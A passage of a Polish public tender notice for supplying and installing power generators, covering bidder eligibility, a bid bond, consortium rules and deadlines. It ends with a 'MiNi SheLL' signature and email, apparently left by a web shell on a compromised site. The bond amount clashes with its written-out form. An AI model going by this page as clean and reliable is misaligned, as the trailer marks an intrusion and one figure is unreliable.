lub oświadczeń, jakich może żądać zamawiający od wykonawcy - Zamawiający będzie żądał od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby - przedstawienia podmiotowych środków dowodowych, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania określone w dokumentacji zamówienia.<br/><br/>Podmiotowe środki dowodowe dotyczące podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach określonych w art. 118 ustawy<br/>1. Zamawiający nie żąda od Wykonawcy przedstawienia podmiotowych środków dowodowych dotyczących podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach określonych w art. 118 ustawy, potwierdzających, że nie zachodzą wobec tych podwykonawców podstawy wykluczenia z postępowania, z zastrzeżeniem ust 2 poniżej<br/>2. Jeżeli w toku badania i oceny oferty okaże się, że wskazany podwykonawca został wskazany w celu potwierdzenia spełniania warunków udziału w postępowaniu, podwykonawca ten będzie traktowany jako podmiot udostępniający zasoby w rozumieniu art. 118 ustawy Pzp, a Zamawiający zażąda od Wykonawcy przedstawienia podmiotowych środków dowodowych dotyczących tego podmiotu, potwierdzających, że nie zachodzą wobec niego podstawy wykluczenia z postępowania, określone w dokumentacji zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dotyczące warunków udziału:<br/>1. W celu spełnienia warunku zdolności technicznej lub zawodowej - o zamówienie ubiegać się może Wykonawca, który nie wcześniej niż w okresie ostatnich 5 lat (przed upływem terminu składania ofert) a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 (dwa) zadania polegające na dostawie z montażem wraz z uruchomieniem agregatów prądotwórczych w budynkach zamieszkania zbiorowego* i/lub budynkach użyteczności publicznej**, każde zadanie o wartości min.: 150 000,00 zł brutto (słownie: sto pięćdziesiąt tysięcy złotych).<br/>Wykaz należy złożyć zgodnie z wzorem stanowiącym załącznik nr 9 do SWZ.<br/>Zamawiający wymaga dowodów określających, czy roboty budowlane wskazane w wykazie, zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>2. W celu spełnienia warunku zdolności technicznej lub zawodowej: Zamawiający wymaga „wykazu osób” skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy złożyć zgodnie z wzorem stanowiącym załącznik nr 10 do SWZ.<br/>Zamawiający będzie weryfikował posiadanie wymaganych uprawnień w oparciu o oświadczenie w formie wykazu osób złożone zgodnie z załącznikiem nr 10 do SWZ. Wykonawcy mogą (fakultatywnie) dołączyć do wykazu zaświadczenie z odpowiedniej izby samorządu zawodowego potwierdzające wymagane uprawnienia i wpis na listę</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda przedmiotowych środków dowodowych.<br/>W celu potwierdzenia zgodności oferowanych dostaw z wymaganiami określonymi w opisie przedmiotu zamówienia i wymaganiami związanymi z realizacją zamówienia, Wykonawca razem z ofertą złoży opis zaoferowanych dostaw sporządzony zgodnie z: załącznikiem nr 1 do SWZ.<br/><br/>Wykonawca pod rygorem odrzucenia oferty, jako niezgodnej z warunkami zamówienia na podstawie art. 226 pkt 5 ustawy pzp, musi dołączyć do oferty opis zaoferowanych dostaw sporządzony zgodnie z załącznikiem nr 1 do SWZ.<br/><br/>Zamawiający zastrzega że przedmiotowy dokument tj.: załącznik nr 1 nie podlega uzupełnieniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wnieść wadium w kwocie: 3000 zł (słownie: dwa tysiące złotych), przed upływem terminu składania ofert i utrzymania wadium nieprzerwanie do dnia upływu terminu związania ofertą z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 pzp.<br/>2. Wadium może być wnoszone w jednej z następujących form:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3. Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy zamawiającego. Nr rachunku: Bank Gospodarstwa Krajowego z siedzibą w Warszawie, Oddział Poznań nr rachunku: 41 1130 1088 0001 3144 2720 0001.<br/>4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w ust. 4 , przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>UWAGA zwracamy uwagę na konieczność zaksięgowania wpłaconej kwoty na rachunku Zamawiającego przed upływem terminu i godziny składania ofert.<br/>5. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie pieniężnej – dokument potwierdzający dokonanie przelewu wadium został załączony do oferty w formie elektronicznej.<br/>6. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie: poręczeń lub gwarancji:<br/>a) Oryginał gwarancji lub poręczenia powinien być złożony razem z ofertą, w postaci elektronicznej za pośrednictwem profilu Zamawiającego na stronie internetowej prowadzonego postepowania https://platformazakupowa.pl/skp, i formularza „Złóż ofertę” dostępnego na odnośniku dotyczącej danego postępowania, opatrzony kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia ze strony gwaranta (lub poręczyciela) i musi obejmować cały okres związania ofertą,<br/>b) powinno być wystawione na Zamawiającego,<br/>c) koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę<br/>d) z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust.6 ustawy Pzp.<br/>e) Zamawiający zwróci wadium wniesione w formie innej niż pieniądzu poprzez złożenia gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium, dlatego w treści gwarancji/poręczenia lub z informacji dołączonej do gwarancji /poręczenia (np. w postaci załącznika) powinny być wskazane wszelkie niezbędne dane kontaktowe do gwaranta/poręczyciela poręczenia w zakresie złożenia ww. oświadczenia o zwrocie wniesionego wadium (zalecamy podanie adres poczty elektronicznej gwaranta lub poręczyciela na który zostanie wysłane oświadczenie Zamawiającego o zwolnieniu z gwarancji lub poręczenia).<br/>f) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument wadium powinno być wystawione na wszystkich Wykonawców wspólnie ubiegających się o zamówienie. Zamawiający uzna wadium za prawidłowo wniesione także w przypadku, jeśli z treści dokumentu będzie wynikać, iż Zamawiający ma prawo do żądania od gwaranta zapłaty oznaczonej kwoty pieniężnej niezależnie od tego, który z Wykonawców wspólnie ubiegających się o udzielenie zamówienia doprowadził do ziszczenia się przesłanek zatrzymania wadium a dokument wadialny wystawiony będzie w dacie już po zawiązaniu konsorcjum wyłącznie na pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (lidera konsorcjum). Z treści gwarancji musi jednoznacznie wynikać, iż w postępowaniu Wykonawca, na którego wystawiono gwarancję występuje wspólnie z innymi Wykonawcami.<br/>7. Oferta Wykonawcy, który nie wniósł wadium, lub wniósł ... (......) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Z pełnomocnictwa musi jednoznacznie wynikać umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia w przedmiotowym postępowaniu, powinno ono zawierać w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. Wszelki kontakt prowadzony będzie wyłącznie ze wskazanym Pełnomocnikiem.<br/>4. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy dołączyć do oferty.<br/>5. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o którym mowa w Części VI Rozdział I ust 1 (oświadczenie z art. 125 ust 1 pzp) i ust 2 SWZ (PODMIOTY ROSYJSKIE) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdzać ma spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. Wymagane dokumenty potwierdzające brak podstaw do wykluczenia składa każdy z Wykonawców.<br/>7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, każdy z Wykonawców jest zobowiązany złożyć oświadczenie, o którym mowa w Części V Rozdział III ust 4 SWZ (oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy, zgodnie z wzorem stanowiącym załącznik nr 6 do SWZ)<br/>8. Uwaga: Przedsiębiorców prowadzących działalność w formie spółki cywilnej, na gruncie ustawy Prawo zamówień publicznych należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>9. Podsumowując:<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców do oferty należy dołączyć:<br/>• Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia sporządzone zgodnie z Częścią VIII lit D pkt 1-4 SWZ;<br/>• oświadczenia o braku podstaw do wykluczenia każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego zgodne z załącznikiem nr 3 do SWZ;<br/>• oświadczenia o braku podstaw do wykluczenia w zakresie podmiotów rosyjskich każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego zgodne z załącznikiem nr 3A do SWZ;<br/>• oświadczenia o spełnieniu warunków udziału w postępowaniu każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu zgodne z załącznikiem nr 4 do SWZ;<br/>• oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy z art. 117 ust 4 ustawy pzp , zgodne z wzorem stanowiącym załącznik nr 6 do SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 pkt 1 ustawy pzp - Strony dopuszczają możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia, w postaci następujących postanowień umownych: <br/>Zmiana terminu realizacji przedmiotu umowy. <br/>Zmiana sposobu świadczenia <br/>Zmiany wynagrodzenia Wykonawcy (publicznoprawna): <br/>Zmiana wynagrodzenia - WALORYZACJA (art. 439 ustawy pzp): <br/>ZMIANY PERSONELU WYKONAWCY <br/>Zmiany podmiotowe: <br/>Do pozostałych zmian umowy, które nie zostały przewidziane przez strony w ust 1-8, stosuję się odpowiednio art. 455 ustawy pzp. <br/>Zmiany postanowień zawartej umowy wymagają, zachowania formy pisemnej pod rygorem nieważności<br/><br/>Szczegóły określa § 7 projektu umowy stanowiącego załącznik nr 12 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-24 07:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1193849</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-24 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zastrzeżenie możliwości unieważnienia postepowania na podstawie art. 310 ustawy pzp Zamawiający przeprowadza niniejsze postępowanie w ramach realizacji zadań objętych Programem Ochrony Ludności i Obrony Cywilnej na lata 2025–2026. W przypadku niepozyskania środków na sfinansowanie niniejszego zamówienia postępowanie może zostać unieważnione na podstawie art. 310 ustawy PZP.<br/><br/>Wizja lokalna obligatoryjna pod rygorem odrzucenia oferty na podstawie art. 226 ust 1 pkt 18 ustawy pzp<br/><br/>Całe zamówienie musi zostać zrealizowane w terminie do dnia: 19 grudnia 2025 roku.<br/>Uzasadnienie daty realizacji zamówienia: Zamawiający ubiega się o sfinansowanie przedmiotowego zamówienia w ramach realizacji zadań objętych Programem Ochrony Ludności i Obrony Cywilnej na lata 2025–2026. Zadania objęte ww. programem maja być wykonane do końca roku 2025.<br/><br/>Ofertę należy złożyć na „Formularzu ofertowym”, zgodnym ze wzorem, stanowiącym załącznik nr 2 SWZ.<br/>2. Do oferty należy dołączyć następujące dokumenty – zgodnie z SWZ<br/>1) Opis przedmiotu zamówienia zgodny z załącznikiem nr 1 do SWZ<br/>Wykonawca musi bezwzględnie , pod rygorem odrzucenia oferty dołączyć do oferty Opis przedmiotu zamówienia zgodny z załącznikiem nr 1 do SWZ.<br/>2) Oświadczenie o braku podstaw do wykluczenia, zgodne z załącznikiem nr 3 do SWZ,<br/>3) Oświadczenie o braku podstaw do wykluczenia w zakresie zakazu udziału podmiotów rosyjskich, zgodnie z załącznikiem nr 3A do SWZ,<br/>4) Oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw do wykluczenia, braku podstaw do wykluczenia w zakresie podmiotów rosyjskich oraz oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodne z załącznikiem nr 3B do SWZ – złożyć o ile dotyczy,<br/>5) Oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodne z załącznikiem nr 4 do SWZ,<br/>Zobowiązanie podmiotu udostępniającego zasoby składane na podstawie art. 118 ust 3 ustawy pzp. Zobowiązanie można złożyć zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ – złożyć o ile dotyczy<br/>7) Oświadczenie wykonawców wspólnie ubiegających się o udzielnie zamówienia publicznego, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenie można złożyć zgodnie przykładowym wzorem stanowiącym załącznikiem nr 6 do SWZ – złożyć, o ile dotyczy,<br/>8) Potwierdzenie dokonania wizji lokalnej<br/>9) Dowód wniesienia wadium<br/>10) ODPIS lub INFORMACJA z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania),<br/>11) Pełnomocnictwo („dokumenty potwierdzające do umocowania”):<br/>a) upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>b) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>c) Umowa spółki cywilnej/uchwała wspólników – dotyczy składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego działających jako wspólnicy spółki cywilnej;<br/>12) Inne np. dokumenty „ samooczyszczenia” jeżeli dotyczy<br/>3. Formularz ofertowy (lub dokument równoważny) stanowi treść oferty. Nie złożenie lub złożenie niekompletnych formularza ofertowego powoduję odrzucenie ofert, z zastrzeżeniem art. 223 ustawy pzp<br/>4. Pozostałe dokumenty, które nie zostały wymienione w ust 2, Wykonawca, którego oferta została najwyżej oceniona, dostarczy na wezwanie Zamawiającego, w terminie nie krótszym niż 5 dni

Creat By MiNi SheLL
Email: jattceo@gmail.com